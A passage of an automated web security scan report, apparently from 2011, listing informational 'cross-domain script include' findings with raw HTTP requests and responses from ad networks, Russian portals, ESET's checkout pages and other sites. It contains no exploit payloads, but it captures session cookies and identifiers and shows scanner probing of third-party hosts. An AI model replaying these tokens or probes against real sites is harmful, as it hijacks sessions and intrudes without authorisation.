'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732017/direct/01/rnd=1043494379?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlNedbcTg0PaihQfN8uf83YXzbLhnZW8sdXNhLHQsMTMwMzc0MTI0OTEwMCxjLDI4OTY2OSxwYyw2OTExMixhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY1LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0FBQUFBQUFBRkVBQUFBQUFBQUFVUUFBQUFNRE16QUJBNFhvVXJrZmhGRURoZWhTdVItRVVRSUNVOEZFbUMxWjhTc1lkYTZiMnppVS1nN1ZOQUFBQUFJQWVBUUMxQUFBQWxnSUFBQUlBQUFESHBBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFDd0ItZ0EzQ1JRRTRnZ0JBZ1VDQUFNQUFBQUFreHpXVndBQUFBQS4vY25kPSF3QV9IdHdqYzh3SVF4OGtLR0FBZzBjY0JLSlFJTVFBQUFMeEg0UlJBUWdvSUFCQUFHQUFnQVNnQlFnc0luMFlRQUJnQUlBTW9BVUlMQ0o5R0VBQVlBQ0FDS0FGSUFWQUFXTGNTWUFCb2xnVS4vcmVmZXJyZXI9aHR0cDovL3d3dy5saXZlam91cm5hbC5jb20vL2NsaWNrZW5jPWh0dHA6Ly9hZGNsaWNrLmcuZG91YmxlY2xpY2submV0L2FjbGs_c2E9bCZhaT1CSlNqQlBvTzFUWnZUQ0pEdmxRZnF2Tnp5QjlmcS1OTUJsNkdVN0JpWG42ZXpJUUFRQVJnQklBQTRBVkNBeC1IRUJHREo3b09JOEtQc0VvSUJGMk5oTFhCMVlpMDBORFUyTVRneU1UTTFPVFUyT1RjMG9BSEQ4djNzQTdJQkUzZDNkeTVzYVhabGFtOTFjbTVoYkM1amIyMjZBUW96TURCNE1qVXdYMkZ6eUFFSjJnRWJhSFIwY0RvdkwzZDNkeTVzYVhabGFtOTFjbTVoYkM1amIyMHZtQUtJSjhBQ0JNZ0NoZExQQ3VBQ0FPb0NHalUyTlRVdmJHb3VhRzl0WlhCaFoyVXZiRzluWjJWa2IzVjBxQU1CNkFQNEFfVURDQUNBaE9BRUFZQUc2Y1NGOU1XUTFva3kmbnVtPTEmc2lnPUFHaVdxdHhtcThuVzNDR2ZKOFJRbmVtOVZlLUduNlBzX2cmY2xpZW50PWNhLXB1Yi00NDU2MTgyMTM1OTU2OTc0JmFkdXJsPQo-/clkurl=">\n'+
'</script>
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69112&c5=166308&c6=&cv=1.3&cj=1&rn=156936241" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

23.2. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ads/?t=i&f=j&p=5112&pl=bca52e1b&rnd=71518370253033940&clkurl=http://ib.adnxs.com/click/H4XrUbgeA0AfhetRuB4DQAAAAMDMzAhAzczMzMzMCEDNzMzMzMwIQOtg8QHzcr0bSsYda6b2ziUhg7VNAAAAAC8hAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAJ_Ck8AhwQBAgUCAAQAAAAAfyWMQQAAAAA./cnd=!0xVmYQj25QIQxskKGAAg0ccBKE8xAAAAwMzMCEBCEwgAEAAYACABKP7__________wFIAFAAWP8UYABolgU./referrer=http%3A%2F%2Fgames.webalta.ru%2F/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DB2DbrIIO1TeCtIcfMsQevr63kDdfq-NMBn6CU7BjbxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0xMTM0ODIyNjgyNTEwODc5oAHD8v3sA7IBEGdhbWVzLndlYmFsdGEucnW6AQoxNjB4NjAwX2FzyAEJ2gEYaHR0cDovL2dhbWVzLndlYmFsdGEucnUvmALWEsACBMgChdLPCqgDAegDaegD1AfoA8EC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtyp--SO2lIMceltajJwn2qFCTNn3A%26client%3Dca-pub-1134822682510879%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUhvvA3uMYtZiectC07uf2QDyvEasDA3gBY2BgEGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo35HdswpnHJJbtdxykV4XcMp5zchBKecawMHVK4N6JbvQLe4wN0i4X4bpz4JO21c.tpP7tyES1_7yRm1OOVOCC_GKXdswSOccke_CuKUm7GAHbecbStOuekPPXHLdazELWeqi1Nu2k1FnHKVZb4MTJNDGVgdnjAw6uQxMHwU.g8EoDSRH8BYDYwTRtx6u4WA8gy.mzMYGDiACWknI1AxQ.AtRiYgxWDAyCDMwKBgBhZcWgAWZMlkZAXKsYQwsTKyARnyuxgZeODpD2QYAwCGTZPB

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUlAz8J7YZQuuVKsw_ef0aAc0zrdADA3gBY2BgEGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo34v16vZuOQ6smNO4ZRLcruOUy7C6xpOOb8JITjlXBs4oHJtQHd.B7rTBebODgn32zj1Sdhp49LXfnLnJlz62k_OqMUpd0J4MU65Ywse4ZQ7.lUQp9yMBey45WxbccpNf.iJW65jJW45U12cctNuKuKUqyzzBYY7I275biGgPIPvlp0NDBzAhLSTkZGRgSHwFiMzkGIwYGIQBvEVzMDCSwvAwiyZjGxAQZYQJjZGdiBDfhcTAzdIGTQNggxkAAAFopIm; Domain=.amgdgt.com; Expires=Wed, 25-May-2011 14:23:13 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3734
Date: Mon, 25 Apr 2011 14:23:13 GMT

_289668_amg_acamp_id=166308;
_289668_amg_pcamp_id=69113;
_289668_amg_location_id=55366;
_289668_amg_creative_id=289668;
_289668_amg_loaded=true;
var _amg_289668_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732016/direct/01/rnd=499353087?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUiPbw6T2uHVm68iJ.eWaH0XWjcghnZW8sdXNhLHQsMTMwMzc0MTM5MzU2NCxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0g0WHJVYmdlQTBBZmhldFJ1QjREUUFBQUFNRE16QWhBemN6TXpNek1DRUROek16TXpNd0lRT3RnOFFIemNyMGJTc1lkYTZiMnppVWhnN1ZOQUFBQUFDOGhBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUpfQ2s4QWh3UUJBZ1VDQUFRQUFBQUFmeVdNUVFBQUFBQS4vY25kPSEweFZtWVFqMjVRSVF4c2tLR0FBZzBjY0JLRTh4QUFBQXdNek1DRUJDRXdnQUVBQVlBQ0FCS1A3X19fX19fX19fX3dGSUFGQUFXUDhVWUFCb2xnVS4vcmVmZXJyZXI9aHR0cDovL2dhbWVzLndlYmFsdGEucnUvL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUIyRGJySUlPMVRlQ3RJY2ZNc1FldnI2M2tEZGZxLU5NQm42Q1U3QmpieE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkweE1UTTBPREl5TmpneU5URXdPRGM1b0FIRDh2M3NBN0lCRUdkaGJXVnpMbmRsWW1Gc2RHRXVjblc2QVFveE5qQjROakF3WDJGenlBRUoyZ0VZYUhSMGNEb3ZMMmRoYldWekxuZGxZbUZzZEdFdWNuVXZtQUxXRXNBQ0JNZ0NoZExQQ3FnREFlZ0RhZWdEMUFmb0E4RUM5UU1BQUFERWdBYm90ODZxd1k2eWh0RUImbnVtPTEmc2lnPUFHaVdxdHlwLS1TTzJsSU1jZWx0YWpKd24ycUZDVE5uM0EmY2xpZW50PWNhLXB1Yi0xMTM0ODIyNjgyNTEwODc5JmFkdXJsPQo-/clkurl=">\n'+
'</script>
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69113&c5=166308&c6=&cv=1.3&cj=1&rn=1508694624" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

23.3. http://auto.webalta.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://auto.webalta.ru
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: auto.webalta.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>................
...[SNIP]...
</script>
           <script type="text/javascript"
           src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

           </script>
...[SNIP]...
</div>
<script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript" defer="defer"></script>
...[SNIP]...

23.4. https://checkout.netsuite.com/s.nl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /s.nl

Issue detail

The response dynamically includes the following scripts from other domains:

Request

NETSPARKER /s.nl?c=438708&sc=4&whence=&n=1&ext=T HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:26:36 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -368828460:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; path=/
Set-Cookie: NLVisitorId=rcHW8495AYoCDqLY; domain=checkout.netsuite.com; expires=Sunday, 15-Apr-2012 14:26:36 GMT; path=/
Set-Cookie: NLShopperId=rcHW8495AZACDgGn; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:26:36 GMT; path=/
Set-Cookie: NS_VER=2011.1.0; domain=checkout.netsuite.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=868
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 26851


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Checkout - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" == document
...[SNIP]...
00&amp;bgbutton=F2F4F6&amp;bgrequiredfld=ffffff&amp;font=Arial%2CHelvetica%2Csans-serif&amp;size_site_content=10pt&amp;size_site_title=10pt&amp;size=1.0&amp;nlinputstyles=T&amp;NS_VER=2011.1.0&amp;3'>
<script type="text/javascript" src="https://secure.eset.com/us/store/geoIpRedirect"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.1.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->

<script type="text/javascript" src="https://secure.eset.com/us/scripts/lib/s_code3.js"></script>
...[SNIP]...

23.5. https://checkout.netsuite.com/s.nl/c.438708/n.1/sc.4/.f  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /s.nl/c.438708/n.1/sc.4/.f

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /s.nl/c.438708/n.1/sc.4/.f?ext=T&login=T&reset=T&newcust=T&noopt=T HTTP/1.1
Host: checkout.netsuite.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1J6WN1GLD7YF97mg4NnnrJtMTLyyBTLW5SC2xnzp2bL1BkKjmqzhQtgw4LDqyWffYxnJ5rLVX4VWGGxBLnQ6WdW126sPpQ9GcKxyvKTvtWBTh6tB9XplC3VFTz911rXl!1384455285; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NS_VER=2011.1.0; mbox=check#true#1303741628|session#1303736347554-914602#1303743428|PC#1303736347554-914602.17#1304951168

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:13:46 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1256561231:616363742D6A6176613032372E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=862
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 33384


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Login - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" == document.lo
...[SNIP]...
00&amp;bgbutton=F2F4F6&amp;bgrequiredfld=ffffff&amp;font=Arial%2CHelvetica%2Csans-serif&amp;size_site_content=10pt&amp;size_site_title=10pt&amp;size=1.0&amp;nlinputstyles=T&amp;NS_VER=2011.1.0&amp;3'>
<script type="text/javascript" src="https://secure.eset.com/us/store/geoIpRedirect"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.1.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->

<script type="text/javascript" src="https://secure.eset.com/us/scripts/lib/s_code3.js"></script>
...[SNIP]...

23.6. http://direct.yandex.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://direct.yandex.ru
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?partner HTTP/1.1
Host: direct.yandex.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:35:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host
Content-Length: 25502


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="nojs">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=Em
...[SNIP]...
<link rel="SHORTCUT ICON" href="/favicon.ico"><script type="text/javascript" src="http://img.yandex.net/y5/1.5b-c/mega-y5.js"></script><link rel="shortcut icon" href="/favicon.ico"/><script type="text/javascript" charset="utf-8" src="//yandex.st/jquery/1.4.2/jquery.min.js"></script><script type="text/javascript" charset="utf-8" src="//yandex.st/lego/2.4-73/common/js/_common.js"></script>
...[SNIP]...

23.7. http://forums.manageengine.com/fbw  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.manageengine.com
Path:   /fbw

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /fbw?fbwId=49000004360353 HTTP/1.1
Host: forums.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/?gclid=CL-9_6TPt6gCFQTe4AodlRiOCw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); zdccn=067f90c3-40d8-4a59-bdeb-52669063c03a; JSESSIONID=9FFB2A137484D14862CCB036AE627428; __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.4.10.1303732848

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 12:11:52 GMT
Server: Apache-Coyote/1.1
Content-Length: 25830


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

<link href="//css.zohostatic.com/discussions/v1/css/feedbackembed.css" type="text/css" rel="stylesheet"/>
<script src="//css.zohostatic.com/discussions/v1/js/zdjquery.min.js" type="text/javascript" ></script>
<script src="//css.zohostatic.com/discussions/v1/js/crossdomain.js" type="text/javascript" ></script>
...[SNIP]...

23.8. http://games.webalta.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://games.webalta.ru
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: games.webalta.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218; pogoda_reg=10290

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:22:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12306


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>........ .... web
...[SNIP]...
</script>
           <script type="text/javascript"
           src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

           </script>
...[SNIP]...

23.9. http://goods.adnectar.com/static/quantcast_1.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://goods.adnectar.com
Path:   /static/quantcast_1.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /static/quantcast_1.html HTTP/1.1
Host: goods.adnectar.com
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adnectar_id=PObkQ021gzROKXjpBM+iAg==

Response

HTTP/1.1 200 OK
Server: nginx/0.7.2
Date: Mon, 25 Apr 2011 14:30:36 GMT
Content-Type: text/html
Content-Length: 590
Last-Modified: Fri, 22 Apr 2011 00:28:44 GMT
Connection: close
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

</head>

<body>

<!-- Star
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.10. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303751219&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F25%2Fdork%2Freflected-xss-cross-site-scripting-cwe-79-capec-86-ghdb-stillsecurecom.html&dt=1303733219665&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303733219698&frm=0&adk=1607234649&ga_vid=1085746718.1303733220&ga_sid=1303733220&ga_hid=111301468&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1018&bih=978&fu=0&ifi=1&dtd=273&xpc=aa0CcXN9Yi&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 12:06:50 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4436

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

23.11. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303751190&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Freflected-xss-cross-site-scripting-cwe-79-capec-86-ghdb-stillsecurecom.html&dt=1303733223690&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303733223727&frm=0&adk=1607234649&ga_vid=700321566.1303733224&ga_sid=1303733224&ga_hid=1638361633&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1018&bih=978&fu=0&ifi=1&dtd=125&xpc=KPpLNnOf5F&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 12:06:53 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12736

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.12. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

